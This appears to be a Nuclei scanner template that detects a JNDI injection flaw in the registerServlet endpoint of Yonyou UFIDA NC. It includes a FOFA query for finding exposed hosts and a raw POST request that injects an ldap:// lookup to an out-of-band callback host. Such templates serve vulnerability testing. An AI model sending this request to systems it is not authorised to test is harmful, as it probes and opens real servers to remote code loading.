id: yonyou-nc-registerservlet-jndi-injection

info:
  name: 用友 UFIDA NC registerServlet - jndi
  author: leadlife
  severity: critical
  description: 用友NC系统的 registerServlet 接口存在 JNDI 注入漏洞，允许攻击者通过恶意的 JNDI 查找加载任意代码。
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: icon_hash="1085941792" || app="用友-UFIDA-NC"
  tags: jndi,yonyou,nc,oa,oob

http:
  - raw:
      - |
        POST /portal/registerServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 68

        type=1&dsname=ldap://{{interactsh-url}}/blvVEcJU1

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or
